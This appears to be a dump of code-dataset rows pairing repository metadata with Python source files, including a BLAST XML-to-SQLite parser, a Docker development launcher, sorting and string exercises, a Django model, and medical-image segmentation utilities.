| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f5ebabcae4886b932638d5f3ecd10d1eb595d7b
| 6,058
|
py
|
Python
|
lib/blastin.py
|
zbwrnz/blastdbm
|
ee694c01ebb00779623702738a9c958fd496a080
|
[
"Unlicense"
] | 1
|
2018-03-22T10:34:20.000Z
|
2018-03-22T10:34:20.000Z
|
lib/blastin.py
|
arendsee/blastdbm
|
ee694c01ebb00779623702738a9c958fd496a080
|
[
"Unlicense"
] | null | null | null |
lib/blastin.py
|
arendsee/blastdbm
|
ee694c01ebb00779623702738a9c958fd496a080
|
[
"Unlicense"
] | null | null | null |
#! /usr/bin/python3
import argparse
import os
import re
import sqlite3 as sql
import sys
import xml.etree.cElementTree as et
import traceback
import lib.initialize as initialize
import lib.sqlite_interface as misc
import lib.meta as meta
# ==================
# EXPORTED FUNCTIONS
# ==================
def parse(parent, *args, **kwargs):
parser = parent.add_parser(
'blast',
help="Read BLAST XML report into SQL database",
parents=args)
parser.add_argument(
'-c', '--collection',
metavar="COL",
help="blast collection")
parser.add_argument(
'-m', '--db_desc',
metavar="DESC",
help="BLAST database description")
parser.add_argument(
'-s', '--small',
help="Reduce database size by not writing alignment sequences",
action=('store_true'), default=False)
parser.add_argument(
'-x', '--max-hits',
metavar="INT",
help='Maximum number of hits to store (default 500)',
type=int,
default=500
)
parser.set_defaults(func=parse_blast_xml)
def parse_blast_xml(args, cur):
if args.input:
for f in args.input:
con = et.iterparse(f, events=('end', 'start'))
_parse_blast_xml(args, cur, con)
else:
con = et.iterparse(sys.stdin, events=('end', 'start'))
_parse_blast_xml(args, cur, con)
def _parse_blast_xml(args, cur, con):
# Initialize tables as necessary
if(not misc.table_exists('blastreport', cur)):
initialize.init_blastreport(cur, verbose=False)
if(not misc.table_exists('blastdatabase', cur)):
initialize.init_blastdatabase(cur, verbose=False)
bdat = Blastdat(cur, args)
for event, elem in con:
if(event == 'start'): continue
if(elem.tag == 'Hsp'):
bdat.add_partial_row()
bdat.clear_hsp()
elif(elem.tag == 'Hit'):
bdat.clear_hit()
elif(elem.tag == 'Iteration'):
if(not bdat.has_hits()):
bdat.add_partial_row()
bdat.clear_iter()
elem.clear()
elif('BlastOutput_db' in elem.tag):
base = os.path.basename(elem.text)
if(not misc.entry_exists('blastdatabase', 'database', base, cur)):
misc.insert({'database': base}, 'blastdatabase', cur)
bdat.add(elem.tag, base)
else:
bdat.add(elem.tag, elem.text)
bdat.write_rows_to_sqldb()
meta.update_dbinfo(cur, verbose=True)
meta.update_mrca(cur, verbose=True)
def _parse_fasta_header(header):
dic = {}
try:
for match in re.finditer('([^|]+)\|([^|]+)', header):
for tag in ('locus', 'gi', 'taxon', 'gb', 'gene'):
if(match.group(1) == tag and match.group(2) != None):
dic['Query_' + tag] = match.group(2)
return(dic)
except:
print("Cannot parse header {}".format(header), file=sys.stderr)
return({})
class Blastdat:
def __init__(self, cur, args):
self.cur = cur
self.args = args
self.dat = {'root':{}, 'iter':{}, 'stat':{}, 'hit':{}, 'hsp':{}}
self.dat['root']['collection'] = args.collection
self.dat['root']['db_desc'] = args.db_desc
self.iter_dicts = []
self.row_by_col = {}
def write_rows_to_sqldb(self):
for col in self.row_by_col.keys():
misc.insertmany(col, self.row_by_col[col], 'BlastReport',
self.cur, replace=True)
def has_hits(self):
try:
if('No hits found' in dat['iter']['Iteration_message']):
return False
except:
pass
return True
def add_partial_row(self):
table = {}
for key in self.dat.keys():
for subkey in self.dat[key].keys():
table[subkey] = self.dat[key][subkey]
self.iter_dicts.append(table)
def _add_rows(self):
if(not self.iter_dicts):
self.add_partial_row()
else:
for d in self.iter_dicts:
if(int(d['Hit_num']) <= self.args.max_hits):
for key, val in self.dat['stat'].items():
d[key] = val
col = tuple(sorted(d.keys()))
row = tuple(map(d.get, col))
try:
self.row_by_col[col].append(row)
except:
self.row_by_col[col] = [row]
self.iter_dicts = []
def clear_iter(self):
'''
Adds all data from current iteration to the database and frees the
iteration and its children hits and hsps from memory
'''
self._add_rows()
self.dat['iter'] = {}
self.dat['stat'] = {}
self.clear_hit()
def clear_hit(self):
'''
Clears the current hit and all children hsps from memory
'''
self.dat['hit'] = {}
self.clear_hsp()
def clear_hsp(self):
'''
Clears hsp from memmory
'''
self.dat['hsp'] = {}
def add(self, tag, text):
'''
Input: One tag and its text (possibly None)
'''
tag = re.sub('-', '_', tag)
if(text is None or text.isspace()): pass
elif('Hsp_' in tag):
if(tag in ('Hsp_qseq', 'Hsp_hseq', 'Hsp_midline') and self.args.small):
pass
else:
self.dat['hsp'][tag] = text
elif('Hit_' in tag):
self.dat['hit'][tag] = text
elif('Iteration_' in tag):
if(tag == 'Iteration_query_def'):
self.dat['iter']['query_seqid'] = re.sub('(\S+).*', '\\1', text)
self.dat['iter'][tag] = text
elif('Statistics_' in tag):
self.dat['stat'][tag] = text
elif('BlastOutput_' in tag or 'Parameters_' in tag):
if('reference' in tag or 'query' in tag):
pass
else:
self.dat['root'][tag] = text
| 31.552083
| 83
| 0.530538
| 733
| 6,058
| 4.249659
| 0.268759
| 0.038202
| 0.020867
| 0.019262
| 0.083467
| 0.05618
| 0.023756
| 0.023756
| 0.023756
| 0
| 0
| 0.002925
| 0.322879
| 6,058
| 191
| 84
| 31.717277
| 0.75646
| 0.05794
| 0
| 0.155844
| 0
| 0
| 0.124955
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084416
| false
| 0.025974
| 0.064935
| 0
| 0.168831
| 0.006494
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f67096a7114362044846dbb3a2978d1562f88ac
| 700
|
py
|
Python
|
Python-AI-Algorithms/Bubble_sort.py
|
screadore/Artificial-Intelligence-Sorting-Algorithms
|
d69f34dbd02556c6a7bbb8e0dee45ab7fdb4b12c
|
[
"MIT"
] | null | null | null |
Python-AI-Algorithms/Bubble_sort.py
|
screadore/Artificial-Intelligence-Sorting-Algorithms
|
d69f34dbd02556c6a7bbb8e0dee45ab7fdb4b12c
|
[
"MIT"
] | null | null | null |
Python-AI-Algorithms/Bubble_sort.py
|
screadore/Artificial-Intelligence-Sorting-Algorithms
|
d69f34dbd02556c6a7bbb8e0dee45ab7fdb4b12c
|
[
"MIT"
] | null | null | null |
# Bubble sort steps through the list and compares adjacent pairs of elements. The elements are swapped if they are in the wrong order. The pass through the unsorted portion of the list is repeated until the list is sorted. Because Bubble sort repeatedly passes through the unsorted part of the list, it has a worst case complexity of O(n²).
def bubble_sort(arr):
def swap(i, j):
arr[i], arr[j] = arr[j], arr[i]
n = len(arr)
swapped = True
x = -1
while swapped:
swapped = False
x = x + 1
for i in range(1, n - x):
if arr[i - 1] > arr[i]:
swap(i - 1, i)
swapped = True
return arr
| 36.842105
| 342
| 0.591429
| 111
| 700
| 3.720721
| 0.477477
| 0.067797
| 0.087167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012848
| 0.332857
| 700
| 19
| 343
| 36.842105
| 0.87152
| 0.482857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.214286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f670af72f12c73cbff679c29371d4269f74b778
| 551
|
py
|
Python
|
Practice/Python/Strings/the_minion_game.py
|
nifannn/HackerRank
|
b05318251226704b1fb949c29aa49493d6ced44b
|
[
"MIT"
] | 7
|
2019-02-22T10:34:26.000Z
|
2021-07-13T01:51:48.000Z
|
Practice/Python/Strings/the_minion_game.py
|
nifannn/HackerRank
|
b05318251226704b1fb949c29aa49493d6ced44b
|
[
"MIT"
] | null | null | null |
Practice/Python/Strings/the_minion_game.py
|
nifannn/HackerRank
|
b05318251226704b1fb949c29aa49493d6ced44b
|
[
"MIT"
] | 7
|
2018-11-09T13:52:34.000Z
|
2021-03-18T20:36:22.000Z
|
def minion_game(string):
# Stuart score
s_idx = [i for i, c in enumerate(string) if c not in 'AEIOU']
s_score = sum([len(string)-i for i in s_idx])
# Kevin score
k_idx = [i for i, c in enumerate(string) if c in 'AEIOU']
k_score = sum([len(string)-i for i in k_idx])
# final result
if k_score > s_score:
print("Kevin {}".format(k_score))
elif k_score < s_score:
print("Stuart {}".format(s_score))
else:
print("Draw")
if __name__ == '__main__':
minion_game(input("Enter a string: "))
| 30.611111
| 65
| 0.604356
| 91
| 551
| 3.417582
| 0.351648
| 0.051447
| 0.064309
| 0.051447
| 0.450161
| 0.340836
| 0.340836
| 0.340836
| 0.186495
| 0.186495
| 0
| 0
| 0.255898
| 551
| 17
| 66
| 32.411765
| 0.758537
| 0.067151
| 0
| 0
| 0
| 0
| 0.107843
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0
| 0
| 0.076923
| 0.230769
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f7622df0a14efca2dcdfe048326621ae11f4cbc
| 550
|
py
|
Python
|
blog/models.py
|
Happy-Project-Foundation/HappyProject
|
86e9fa7633e68c026e0003f8494df0226fa0dfcf
|
[
"Apache-2.0"
] | 3
|
2021-12-04T15:00:54.000Z
|
2021-12-08T16:07:35.000Z
|
blog/models.py
|
BirnadinErick/HappyProject
|
4993a2d966d9c1458ce0e29e72c3a758a7a4ef54
|
[
"Apache-2.0"
] | 3
|
2021-12-15T00:49:01.000Z
|
2021-12-16T00:46:14.000Z
|
blog/models.py
|
Happy-Project-Foundation/HappyProject
|
86e9fa7633e68c026e0003f8494df0226fa0dfcf
|
[
"Apache-2.0"
] | 3
|
2021-12-04T14:18:15.000Z
|
2021-12-05T08:40:13.000Z
|
import uuid
from django.db import models
from django.db.models.fields import TextField
class Blog(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
title = models.CharField(verbose_name="Title", max_length=150, default="Happy Blog", blank=False)
content = models.TextField(verbose_name="Content:", max_length=500, blank=False, default="Happy Content")
summary = models.TextField(verbose_name="Summary", max_length=300,
blank=True)
def __str__(self):
return self.title
| 32.352941
| 109
| 0.736364
| 74
| 550
| 5.324324
| 0.5
| 0.083756
| 0.060914
| 0.13198
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021322
| 0.147273
| 550
| 16
| 110
| 34.375
| 0.818763
| 0
| 0
| 0
| 0
| 0
| 0.078182
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.272727
| 0.090909
| 0.909091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f79434b07d0fd0852489b19f8f438fa54ae857d
| 7,273
|
py
|
Python
|
finetune_test.py
|
tengfeixue-victor/One-Shot-Animal-Video-Segmentation
|
15f9011c1b10f1e0c068f90ed46e72b3bc343310
|
[
"MIT"
] | 2
|
2021-09-26T07:03:54.000Z
|
2022-02-21T15:46:30.000Z
|
finetune_test.py
|
tengfeixue-victor/One-Shot-Animal-Video-Segmentation
|
15f9011c1b10f1e0c068f90ed46e72b3bc343310
|
[
"MIT"
] | null | null | null |
finetune_test.py
|
tengfeixue-victor/One-Shot-Animal-Video-Segmentation
|
15f9011c1b10f1e0c068f90ed46e72b3bc343310
|
[
"MIT"
] | 1
|
2021-04-16T06:11:41.000Z
|
2021-04-16T06:11:41.000Z
|
"""
References: https://github.com/scaelles/OSVOS-TensorFlow
"""
from __future__ import print_function
import os
import random
import tensorflow as tf
import time
import numpy as np
from utils import models
from utils.load_data_finetune import Dataset
from utils.logger import create_logger
# seed
seed = random.randint(1, 100000)
# seed = 0
tf.random.set_seed(seed)
random.seed(seed)
np.random.seed(seed)
# User defined path parameters
# finetuning (one label) and testing dataset
sequence_images_path = './datasets/finetune_test_dataset/JPEGImages/480p'
sequence_names = os.listdir(sequence_images_path)
# Get the best frame selection from BubblNet
bub_frame_path = './datasets/bubbleNet_data/rawData'
def create_non_exist_file(non_exist_file):
"""Create the file when it does not exist"""
if not os.path.exists(non_exist_file):
os.mkdir(non_exist_file)
def select_optimal_frame(seq_name):
"""Use the optimal frame from BubbleNet selection for fine-tuning"""
# # Select from BN0 or BNLF
# frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/all.txt')
# # Select from BN0
# frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BN0.txt')
# Select from BNLF
frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BNLF.txt')
frame_file = open(frame_txt, 'r')
frame_nums = frame_file.readlines()
# The following code is used to extract the name of frame selection
# refer to the txt file in './datasets/bubbleNet_data/rawData/frame_selection' for your information
if len(frame_nums) == 3:
frame_random_jpg = frame_nums[2][:9]
frame_random_png = frame_nums[2][:5] + '.png'
# when two bubblenet models select the different frames, the txt file will have 5 lines
elif len(frame_nums) == 5:
frame_suggestion1_jpg = frame_nums[2][:9]
frame_suggestion1_png = frame_nums[2][:5] + '.png'
frame_suggestion2_jpg = frame_nums[4][:9]
frame_suggestion2_png = frame_nums[4][:5] + '.png'
frame_random_lst = random.choice(
[[frame_suggestion1_jpg, frame_suggestion1_png], [frame_suggestion2_jpg, frame_suggestion2_png]])
frame_random_jpg = frame_random_lst[0][:9]
frame_random_png = frame_random_lst[1][:9]
else:
raise ValueError("frame file from BubbleNet is not correct")
return frame_random_jpg, frame_random_png
def train_test(video_path_names):
start_time = time.time()
for sequence_name in video_path_names:
seq_name = "{}".format(sequence_name)
gpu_id = 0
# Train and test parameters
# training and testing or testing only
train_model = True
objectness_steps = 45000
# The path to obtain weights from objectness training
objectness_path = os.path.join('weights', 'objectness_weights', 'objectness_weights.ckpt-{}'.format(objectness_steps))
# The path to save weights of fine tuning
logs_path_base = os.path.join('weights', 'fine_tune_weights')
create_non_exist_file(logs_path_base)
logs_path = os.path.join(logs_path_base, seq_name)
logger = create_logger(logs_path_base)
logger.info('The random seed is {}'.format(seed))
max_training_iters = 200
# use GFS
use_GFS = True
# test data augmentation
test_aug = True
# train data augmentation
data_aug = True
logger.info('Data augmentation is {}'.format(data_aug))
logger.info('Test augmentation is {}'.format(test_aug))
logger.info('Use GFS is {}'.format(use_GFS))
# Define Dataset
# the video for tesing
test_frames = sorted(
os.listdir(os.path.join('datasets', 'finetune_test_dataset', 'JPEGImages', '480p', seq_name)))
test_imgs = [os.path.join('datasets', 'finetune_test_dataset', 'JPEGImages', '480p', seq_name, frame) for frame
in test_frames]
# result paths
create_non_exist_file('results')
result_path_base = os.path.join('results', 'segmentation')
create_non_exist_file(result_path_base)
result_path = os.path.join(result_path_base, seq_name)
create_non_exist_file(result_path)
if train_model:
if use_GFS:
# BubbleNet selection: one optimal frame
frame_random_jpg, frame_random_png = select_optimal_frame(seq_name)
selected_image = os.path.join('datasets', 'finetune_test_dataset', 'JPEGImages', '480p', seq_name,
frame_random_jpg)
selected_mask = os.path.join('datasets', 'finetune_test_dataset', 'Annotations', '480p', seq_name,
frame_random_png)
train_imgs = [selected_image + ' ' + selected_mask]
logger.info('select frame {} in folder {}'.format(frame_random_jpg, seq_name))
else:
# Train on the first frame
logger.info('train on first frame')
train_imgs = [os.path.join('datasets', 'finetune_test_dataset',
'JPEGImages', '480p', seq_name, '00000.jpg') + ' ' + os.path.join('datasets', 'finetune_test_dataset',
'Annotations', '480p', seq_name, '00000.png')]
dataset = Dataset(train_imgs, test_imgs, './', data_aug=data_aug, test_aug=test_aug)
# testing only
else:
# test augmentation is on
dataset = Dataset(None, test_imgs, './', test_aug=test_aug)
# Train the network
if train_model:
# More training parameters
learning_rate = 1e-7
save_step = max_training_iters
# no side supervision
side_supervision = 3
logger.info('The supervision mode is {}'.format(side_supervision))
display_step = 10
with tf.Graph().as_default():
with tf.device('/gpu:' + str(gpu_id)):
# global_step is related to the name of cpkt file
global_step = tf.Variable(0, name='global_step', trainable=False)
models.train_finetune(dataset, objectness_path, side_supervision, learning_rate, logs_path,
max_training_iters, save_step, display_step, global_step, logger, finetune=2,
iter_mean_grad=1, ckpt_name=seq_name, dropout_rate=1.0)
# Test the network
with tf.Graph().as_default():
with tf.device('/gpu:' + str(gpu_id)):
# No fine-tuning
checkpoint_path = os.path.join('weights/fine_tune_weights/', seq_name,
seq_name + '.ckpt-' + str(max_training_iters))
# generate results images(binary) to the results path
models.test(dataset, checkpoint_path, result_path)
end_time = time.time()
running_time = round(end_time - start_time, 3)
FPS = running_time/493.0
logger.info('The testing time is {}s'.format(running_time))
logger.info('The FPS is {}'.format(FPS))
if __name__ == '__main__':
train_test(sequence_names)
| 41.56
| 126
| 0.639214
| 933
| 7,273
| 4.705252
| 0.219721
| 0.028702
| 0.034169
| 0.043052
| 0.256036
| 0.205923
| 0.15467
| 0.140091
| 0.140091
| 0.140091
| 0
| 0.017331
| 0.262203
| 7,273
| 174
| 127
| 41.798851
| 0.800783
| 0.179843
| 0
| 0.083333
| 0
| 0
| 0.134641
| 0.047869
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0.083333
| 0
| 0.12037
| 0.009259
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f7a417145bc1e9d7aeea4542c8fef811419cb42
| 4,906
|
py
|
Python
|
codepod/impl.py
|
alexmorley/codepod
|
d932391beda9c4df7f048326afe7d0ea73ccb141
|
[
"Apache-2.0"
] | null | null | null |
codepod/impl.py
|
alexmorley/codepod
|
d932391beda9c4df7f048326afe7d0ea73ccb141
|
[
"Apache-2.0"
] | null | null | null |
codepod/impl.py
|
alexmorley/codepod
|
d932391beda9c4df7f048326afe7d0ea73ccb141
|
[
"Apache-2.0"
] | null | null | null |
import subprocess
import os
import shutil
import tempfile
import random
import string
import yaml
src_dir=os.path.dirname(os.path.realpath(__file__))
def codepod(*,repository='',image=None,volumes=[],mount_tmp=True,host_working_directory=None,docker_opts=None,git_smart=False,no_pull=False,command=False):
if not docker_opts:
docker_opts=''
if docker_opts.startswith('"'):
docker_opts=docker_opts[1:-1]
if host_working_directory is None:
if not repository:
raise Exception('You must either specify a repository or a host working directory.')
host_working_directory=_get_random_directory()
host_working_directory=os.path.abspath(host_working_directory)
if repository:
if os.path.exists(host_working_directory):
raise Exception('Host working directory already exists: '+host_working_directory)
_git_clone_into_directory(repository,host_working_directory)
config={}
if os.path.exists(host_working_directory+'/.codepod.yml'):
print(host_working_directory+'/.codepod.yml')
config=_parse_yaml(host_working_directory+'/.codepod.yml')
print(':::::::::::::::::::::::config:',config)
if image is None:
if 'image' in config:
image=config['image']
if image is None:
image='magland/codepod:latest'
print('Using image: '+image)
opts=[
'-it',
'--mount type=bind,source={src_dir}/codepod_init_in_container.py,destination=/codepod_init,readonly',
'--mount type=bind,source={host_working_directory},destination=/home/project',
'--network host',
'--privileged',
'-e DISPLAY=unix{}'.format(os.environ.get('DISPLAY','')),
'--mount type=bind,source=/tmp/.X11-unix,destination=/tmp/.X11-unix'
]
if command is not None:
del opts[0]
config['tasks'].append({'command':command})
# git configuration
#if [ -f "$HOME/.gitconfig" ]; then
# OPTS="$OPTS -v $HOME/.gitconfig:/home/theiapod/.gitconfig"
#fi
#if [ -d "$HOME/.git-credential-cache" ]; then
# OPTS="$OPTS -v $HOME/.git-credential-cache:/home/theiapod/.git-credential-cache"
#fi
path0=os.environ.get('HOME','')+'/.gitconfig'
if os.path.exists(path0):
print('Mounting '+path0)
opts.append('--mount type=bind,source={},destination={}'.format(path0,'/home/user/.gitconfig'))
path0=os.environ.get('HOME','')+'/.git-credential-cache'
if os.path.exists(path0):
print('Mounting '+path0)
opts.append('--mount type=bind,source={},destination={}'.format(path0,'/home/user/.git-credential-cache'))
if mount_tmp:
opts.append('--mount type=bind,source=/tmp,destination=/tmp')
for vv in volumes:
if type(vv)==tuple:
opts.append('--mount type=bind,source={},destination={}'.format(os.path.abspath(vv[0]),os.path.abspath(vv[1])))
else:
raise Exception('volumes must be tuples.')
if no_pull:
print('Not pulling docker image because no_pull was specified')
else:
try:
_run_command_and_print_output('docker pull {image}'.format(image=image))
except:
print('WARNING: failed to pull docker image: {image}... proceeding without pulling...'.format(image=image))
cmd='docker run {opts} {docker_opts} {image} /home/project {user} {uid}'
#cmd='docker run {opts} {image}'
cmd=cmd.replace('{opts}',' '.join(opts))
cmd=cmd.replace('{docker_opts}',docker_opts)
cmd=cmd.replace('{src_dir}',src_dir)
cmd=cmd.replace('{image}',image)
# cmd=cmd.replace('{repository}',repository)
cmd=cmd.replace('{host_working_directory}',host_working_directory)
cmd=cmd.replace('{user}',os.environ['USER'])
cmd=cmd.replace('{uid}',str(os.getuid()))
print('RUNNING: '+cmd)
os.system(cmd)
#_run_command_and_print_output(cmd)
#def _write_text_file(fname,txt):
# with open(fname,'w') as f:
# f.write(txt)
def _parse_yaml(fname):
try:
with open(fname) as f:
obj=yaml.load(f)
return obj
except:
return None
def _get_random_directory():
return tempfile.gettempdir()+'/codepod_workspace_'+_get_random_string(10)
def _get_random_string(N):
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(N))
def _git_clone_into_directory(repo,path):
cmd='git clone {} {}'.format(repo,path)
_run_command_and_print_output(cmd)
def execute(cmd):
popen = subprocess.Popen(cmd, stdout=subprocess.PIPE, universal_newlines=True)
for stdout_line in iter(popen.stdout.readline, ""):
#yield stdout_line
print(stdout_line,end='\r')
popen.stdout.close()
return_code = popen.wait()
if return_code:
raise subprocess.CalledProcessError(return_code, cmd)
def _run_command_and_print_output(cmd):
print('RUNNING: '+cmd);
execute(cmd.split())
| 35.294964
| 155
| 0.664492
| 640
| 4,906
| 4.917188
| 0.254688
| 0.055926
| 0.101684
| 0.042262
| 0.224658
| 0.175405
| 0.116301
| 0.075628
| 0.06101
| 0.06101
| 0
| 0.004713
| 0.178353
| 4,906
| 138
| 156
| 35.550725
| 0.775986
| 0.091521
| 0
| 0.117647
| 0
| 0.019608
| 0.264746
| 0.113913
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068627
| false
| 0
| 0.068627
| 0.019608
| 0.176471
| 0.127451
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f7b66cd930462b5d1756ba227c23eb8265b8002
| 5,040
|
py
|
Python
|
closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py
|
ctuning/inference_results_v1.1
|
d9176eca28fcf6d7a05ccb97994362a76a1eb5ab
|
[
"Apache-2.0"
] | 388
|
2018-09-13T20:48:58.000Z
|
2020-11-23T11:52:13.000Z
|
closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py
|
ctuning/inference_results_v1.1
|
d9176eca28fcf6d7a05ccb97994362a76a1eb5ab
|
[
"Apache-2.0"
] | 597
|
2018-10-08T12:45:29.000Z
|
2020-11-24T17:53:12.000Z
|
closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py
|
ctuning/inference_results_v1.1
|
d9176eca28fcf6d7a05ccb97994362a76a1eb5ab
|
[
"Apache-2.0"
] | 228
|
2018-11-06T02:04:14.000Z
|
2020-12-09T07:51:02.000Z
|
#! /usr/bin/env python3
# coding=utf-8
# Copyright (c) 2021 NVIDIA CORPORATION. All rights reserved.
# Copyright 2021 The MLPerf Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import time
from scipy import signal
from global_vars import *
__doc__ = """
Collection of utilities 3D UNet MLPerf-Inference reference model uses.
gaussian_kernel(n, std):
returns gaussian kernel; std is standard deviation and n is number of points
apply_norm_map(image, norm_map):
applies normal map norm_map to image and return the outcome
apply_argmax(image):
returns indices of the maximum values along the channel axis
finalize(image, norm_map):
finalizes results obtained from sliding window inference
prepare_arrays(image, roi_shape):
returns empty arrays required for sliding window inference upon roi_shape
get_slice_for_sliding_window(image, roi_shape, overlap):
returns indices for image stride, to fulfill sliding window inference
timeit(function):
custom-tailored decorator for runtime measurement of each inference
"""
def gaussian_kernel(n, std):
"""
Returns gaussian kernel; std is standard deviation and n is number of points
"""
gaussian1D = signal.gaussian(n, std)
gaussian2D = np.outer(gaussian1D, gaussian1D)
gaussian3D = np.outer(gaussian2D, gaussian1D)
gaussian3D = gaussian3D.reshape(n, n, n)
gaussian3D = np.cbrt(gaussian3D)
gaussian3D /= gaussian3D.max()
return gaussian3D
def apply_norm_map(image, norm_map):
"""
Applies normal map norm_map to image and return the outcome
"""
image /= norm_map
return image
def apply_argmax(image):
"""
Returns indices of the maximum values along the channel axis
Input shape is (bs=1, channel=3, (ROI_SHAPE)), float -- sub-volume inference result
Output shape is (bs=1, channel=1, (ROI_SHAPE)), integer -- segmentation result
"""
channel_axis = 1
image = np.argmax(image, axis=channel_axis).astype(np.uint8)
image = np.expand_dims(image, axis=0)
return image
def finalize(image, norm_map):
"""
Finalizes results obtained from sliding window inference
"""
# NOTE: layout is assumed to be linear (NCDHW) always
# apply norm_map
image = apply_norm_map(image, norm_map)
# argmax
image = apply_argmax(image)
return image
def prepare_arrays(image, roi_shape=ROI_SHAPE):
"""
Returns empty arrays required for sliding window inference such as:
- result array where sub-volume inference results are gathered
- norm_map where normal map is constructed upon
- norm_patch, a gaussian kernel that is applied to each sub-volume inference result
"""
assert isinstance(roi_shape, list) and len(roi_shape) == 3 and any(roi_shape),\
f"Need proper ROI shape: {roi_shape}"
image_shape = list(image.shape[2:])
result = np.zeros(shape=(1, 3, *image_shape), dtype=image.dtype)
norm_map = np.zeros_like(result)
norm_patch = gaussian_kernel(
roi_shape[0], 0.125*roi_shape[0]).astype(norm_map.dtype)
return result, norm_map, norm_patch
def get_slice_for_sliding_window(image, roi_shape=ROI_SHAPE, overlap=SLIDE_OVERLAP_FACTOR):
"""
Returns indices for image stride, to fulfill sliding window inference
Stride is determined by roi_shape and overlap
"""
assert isinstance(roi_shape, list) and len(roi_shape) == 3 and any(roi_shape),\
f"Need proper ROI shape: {roi_shape}"
assert isinstance(overlap, float) and overlap > 0 and overlap < 1,\
f"Need sliding window overlap factor in (0,1): {overlap}"
image_shape = list(image.shape[2:])
dim = len(image_shape)
strides = [int(roi_shape[i] * (1 - overlap)) for i in range(dim)]
size = [(image_shape[i] - roi_shape[i]) //
strides[i] + 1 for i in range(dim)]
for i in range(0, strides[0] * size[0], strides[0]):
for j in range(0, strides[1] * size[1], strides[1]):
for k in range(0, strides[2] * size[2], strides[2]):
yield i, j, k
def runtime_measure(function):
"""
A decorator for runtime measurement
Custom-tailored for measuring inference latency
Also prints str: mystr that summarizes work in SUT
"""
def get_latency(*args, **kw):
ts = time.time()
result, mystr = function(*args, **kw)
te = time.time()
print('{:86} took {:>10.5f} sec'.format(mystr, te - ts))
return result, ""
return get_latency
| 32.101911
| 91
| 0.698611
| 727
| 5,040
| 4.734525
| 0.310867
| 0.055782
| 0.020918
| 0.019756
| 0.36258
| 0.32946
| 0.30796
| 0.30796
| 0.286461
| 0.286461
| 0
| 0.017799
| 0.208532
| 5,040
| 156
| 92
| 32.307692
| 0.845074
| 0.333135
| 0
| 0.125
| 0
| 0
| 0.291732
| 0.024025
| 0
| 0
| 0
| 0
| 0.041667
| 1
| 0.111111
| false
| 0
| 0.055556
| 0
| 0.263889
| 0.013889
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f7d2edfb9acb222096440265492c363f375f8a6
| 3,047
|
py
|
Python
|
fdtool/modules/GetFDs.py
|
